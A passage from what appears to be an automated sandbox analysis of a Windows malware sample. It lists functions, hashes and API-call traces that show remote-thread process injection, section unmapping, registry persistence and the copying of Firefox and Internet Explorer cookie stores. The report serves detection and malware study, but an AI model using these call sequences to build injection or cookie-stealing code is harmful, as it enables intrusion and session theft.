    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CD171, Relevance: 9.1, APIs: 6, Instructions: 67 Total matches: 31thread
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3D4D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 38registry
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C13D6, Relevance: 4.5, APIs: 3, Instructions: 18 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
